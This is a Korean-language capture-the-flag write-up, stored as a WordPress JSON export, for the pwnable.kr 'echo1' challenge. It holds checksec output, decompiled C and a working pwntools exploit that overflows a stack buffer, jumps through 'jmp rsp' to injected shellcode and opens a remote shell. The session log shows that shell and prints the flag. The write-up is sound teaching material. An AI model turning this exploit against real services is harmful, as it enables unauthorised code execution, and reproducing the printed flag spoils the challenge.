{"id":2542,"date":"2024-05-23T04:45:43","date_gmt":"2024-05-22T19:45:43","guid":{"rendered":"https:\/\/h4ck.kr\/?p=2542"},"modified":"2024-05-23T04:47:55","modified_gmt":"2024-05-22T19:47:55","slug":"echo1","status":"publish","type":"post","link":"https:\/\/h4ck.kr\/?p=2542","title":{"rendered":"echo1"},"content":{"rendered":"\n<h2 class=\"wp-block-heading\">Description<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Pwn this echo service.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">download : http:\/\/pwnable.kr\/bin\/echo1<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Running at : nc pwnable.kr 9010<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">checksec<\/h2>\n\n\n\n<div class=\"wp-block-columns is-layout-flex wp-container-core-columns-is-layout-8f761849 wp-block-columns-is-layout-flex\">\n<div class=\"wp-block-column is-layout-flow wp-block-column-is-layout-flow\" style=\"flex-basis:100%\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">ubuntu@wh1te4ever-main:~\/Desktop\/dreamhack-CTF\/pwnable.kr-echo1$ checksec .\/echo1\n[*] '\/home\/ubuntu\/Desktop\/dreamhack-CTF\/pwnable.kr-echo1\/echo1'\n    Arch:     amd64-64-little\n    RELRO:    Partial RELRO\n    Stack:    No canary found\n    NX:       NX disabled\n    PIE:      No PIE (0x400000)\n    RWX:      Has RWX segments<\/pre>\n<\/div>\n<\/div>\n\n\n\n<p class=\"wp-block-paragraph\">ASLR \ubc0f \uce74\ub098\ub9ac \ubcf4\ud638\uae30\ubc95 X + \uc258\ucf54\ub4dc \uc2e4\ud589 \uac00\ub2a5 (checksec: No PIE, No canary, NX disabled)<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Decompiled-src \/ Analysis<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>main<\/strong><\/p>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" 
data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">int __fastcall main(int argc, const char **argv, const char **envp)\n{\n  _QWORD *v3; \/\/ rax\n  unsigned int i; \/\/ [rsp+Ch] [rbp-24h] BYREF\n  _QWORD v6[4]; \/\/ [rsp+10h] [rbp-20h] BYREF\n\n  setvbuf(stdout, 0LL, 2, 0LL);\n  setvbuf(stdin, 0LL, 1, 0LL);\n  o = malloc(0x28uLL);\n  *((_QWORD *)o + 3) = greetings;\n  *((_QWORD *)o + 4) = byebye;\n  printf(\"hey, what's your name? : \");\n  __isoc99_scanf(\"%24s\", v6);\n  v3 = o;\n  *(_QWORD *)o = v6[0];\n  v3[1] = v6[1];\n  v3[2] = v6[2];\n  id = v6[0];\n  getchar();\n  func[0] = (__int64)echo1;\n  qword_602088 = (__int64)echo2;\n  qword_602090 = (__int64)echo3;\n  for ( i = 0; i != 121; i = getchar() )\n  {\n    while ( 1 )\n    {\n      while ( 1 )\n      {\n        puts(\"\\n- select echo type -\");\n        puts(\"- 1. : BOF echo\");\n        puts(\"- 2. : FSB echo\");\n        puts(\"- 3. : UAF echo\");\n        puts(\"- 4. : exit\");\n        printf(\"> \");\n        __isoc99_scanf(\"%d\", &amp;i);\n        getchar();\n        if ( i > 3 )\n          break;\n        ((void (*)(void))func[i - 1])();\n      }\n      if ( i == 4 )\n        break;\n      puts(\"invalid menu\");\n    }\n    cleanup();\n    printf(\"Are you sure you want to exit? 
(y\/n)\");\n  }\n  puts(\"bye\");\n  return 0;\n}<\/pre>\n<\/div><\/div>\n\n\n\n<p class=\"wp-block-paragraph\">\ucc98\uc74c\uc5d0 scanf \ud568\uc218\ub97c \ud1b5\ud574 id\ub77c\ub294 \uc804\uc5ed\ubcc0\uc218\uc5d0 4\ubc14\uc774\ud2b8\uc758 \uc6d0\ud558\ub294 \uac12\uc744 \uc785\ub825\ud560 \uc218 \uc788\ub2e4.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\uadf8\ub9ac\uace0 echo type\uc744 \ud1b5\ud574 1-4\ubc88 \uba54\ub274\ub97c \uace0\ub97c \uc218 \uc788\ub294\ub370, <br>2, 3\ubc88 \uba54\ub274\ub294 &#8220;not supported&#8221;\ub77c\uace0 \ub728\ub294 \ubc18\uba74, <br>1\ubc88 \uba54\ub274\uc5d0\uc11c\ub294&#8230;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>echo1<\/strong><\/p>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">__int64 echo1()\n{\n  char s[32]; \/\/ [rsp+0h] [rbp-20h] BYREF\n\n  (*((void (__fastcall **)(void *))o + 3))(o);\n  get_input(s, 128LL);\n  puts(s);\n  (*((void (__fastcall **)(void *))o + 4))(o);\n  return 0LL;\n}<\/pre>\n<\/div><\/div>\n\n\n\n<p class=\"wp-block-paragraph\">\uc704\uc640 \uac19\uc774 1\ubc88 \uba54\ub274\uc5d0\uc11c\ub294 <br>\ud560\ub2f9\ub41c 32\ubc14\uc774\ud2b8\uc758 s \ubcc0\uc218\uc5d0 128\ubc14\uc774\ud2b8\uc758 \uac12\uc744 \uc785\ub825\ubc1b\uc744 \uc218 \uc788\uc5b4 BOF \ucde8\uc57d\uc810\uc744 \ubc1c\uc0dd\uc2dc\ud0ac \uc218 \uc788\ub2e4.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Solution<\/h2>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large is-resized\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"725\" src=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc1-3-1024x725.png\" alt=\"\" class=\"wp-image-2549\" 
style=\"width:540px;height:auto\" srcset=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc1-3-1024x725.png 1024w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc1-3-300x212.png 300w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc1-3-768x543.png 768w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc1-3-1536x1087.png 1536w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/05\/\uadf8\ub9bc1-3-2048x1449.png 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/div>\n\n\n<p class=\"wp-block-paragraph\">main \ud568\uc218\uc5d0\uc11c id \ubcc0\uc218\uc5d0\ub294 jmp rsp; opcode\ub97c \uc9d1\uc5b4\ub123\uace0, <br>echo1 \ud568\uc218\uc5d0\uc11c BOF \ucde8\uc57d\uc810\uc744 \ubc1c\uc0dd\uc2dc\ud0ac\ub54c, <br>echo1&#8217;s RET\uc5d0\ub294 id \uc8fc\uc18c\uac12\uc73c\ub85c \ub36e\uace0, \uadf8 \ub4a4\uc5d0\ub294 \uc258\ucf54\ub4dc\ub85c \ud398\uc774\ub85c\ub4dc\ub97c \uad6c\uc131\ud558\uba74 \ub41c\ub2e4.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\uadf8\ub7ec\uba74 echo1 \ud568\uc218\uc758 \uc5d0\ud544\ub85c\uadf8 \ub05d\uc5d0\ub294 rsp\uac00 \uc258\ucf54\ub4dc\ub97c \uac00\ub9ac\ud0a4\uac8c \ub418\ub294\ub370,<br>echo1&#8217;s RET\uc5d0 \ub36e\uc5b4\uc4f0\uc5ec\uc9c4 id \uc8fc\uc18c\uac12\uc758 jmp rsp; \uba85\ub839\uc5b4\uc5d0 \uc758\ud574 \uc258\ucf54\ub4dc\ub85c \uc810\ud504\ud558\uac8c \ub41c\ub2e4!<\/p>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"python\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">from pwn import *\n#context.log_level = 'debug'\ncontext(arch='amd64', os='linux')\nwarnings.filterwarnings('ignore')\n\np = remote(\"pwnable.kr\", 9010)\n#p = process(\".\/echo1\")\ne = ELF('.\/echo1', 
checksec=False)\n\nshellcode = asm(shellcraft.sh())\np.sendlineafter(b\"hey, what's your name? : \", asm(\"nop; nop; jmp rsp\"))\n\np.sendlineafter(b\"> \", b\"1\")\n\np.sendline(b'A'*40 + p64(e.sym['id']) + shellcode)\n\np.interactive()<\/pre>\n<\/div><\/div>\n\n\n\n<h2 class=\"wp-block-heading\">Result<\/h2>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-constrained wp-block-group-is-layout-constrained\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">ubuntu@wh1te4ever-main:~\/Desktop\/dreamhack-CTF\/pwnable.kr-echo1$ python3 solve.py\n[+] Opening connection to pwnable.kr on port 9010: Done\n[*] Switching to interactive mode\nhello \\x90\\x90\\xff\\xe4\n$                  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\\xa0 `\ngoodbye \\x90\\x90\\xff\\xe4\n$                      ls\necho1\nflag\nlog\nsuper.pl\n$ cat flag\nH4d_som3_fun_w1th_ech0_ov3rfl0w\n$ \n[*] Interrupted\n[*] Closed connection to pwnable.kr port 9010<\/pre>\n<\/div><\/div>\n","protected":false},"excerpt":{"rendered":"<p>Description Pwn this echo service. download : http:\/\/pwnable.kr\/bin\/echo1 Running at : nc pwnable.kr 9010 checksec ASLR \b\ubc0f \uce74\ub098\ub9ac \ubcf4\ud638\uae30\ubc95 X + \uc258\ucf54\ub4dc \uc2e4\ud589 \uac00\ub2a5 Decompiled-src \/ Analysis main \ucc98\uc74c\uc5d0 scanf \ud568\uc218\ub97c \ud1b5\ud574 id\ub77c\ub294 \uc804\uc5ed\ubcc0\uc218\uc5d0 4\ubc14\uc774\ud2b8\uc758 \uc6d0\ud558\ub294 \uac12\uc744 \uc785\ub825\ud560 \uc218 \uc788\ub2e4. 
\uadf8\ub9ac\uace0 echo type\uc744 \ud1b5\ud574 1-4\ubc88 \uba54\ub274\ub97c \uace0\ub97c \uc218 \uc788\ub294\ub370, 2, 3\ubc88 \uba54\ub274\ub294 &#8220;not supported&#8221;\ub77c\uace0 \ub728\ub294&hellip;&nbsp;<a href=\"https:\/\/h4ck.kr\/?p=2542\" rel=\"bookmark\">\ub354 \ubcf4\uae30 &raquo;<span class=\"screen-reader-text\">echo1<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"neve_meta_sidebar":"","neve_meta_container":"","neve_meta_enable_content_width":"","neve_meta_content_width":0,"neve_meta_title_alignment":"","neve_meta_author_avatar":"","neve_post_elements_order":"","neve_meta_disable_header":"","neve_meta_disable_footer":"","neve_meta_disable_title":"","_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[4],"tags":[25],"class_list":["post-2542","post","type-post","status-publish","format-standard","hentry","category-pwnable-kr","tag-pwnable"],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/2542","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2542"}],"version-history":[{"count":5,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/2542\/revisions"}],"predecessor-version":[{"id":2550,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/2542\/revisions\/2550"}],"wp:attachment":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2542"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/h4ck.k
r\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2542"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2542"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}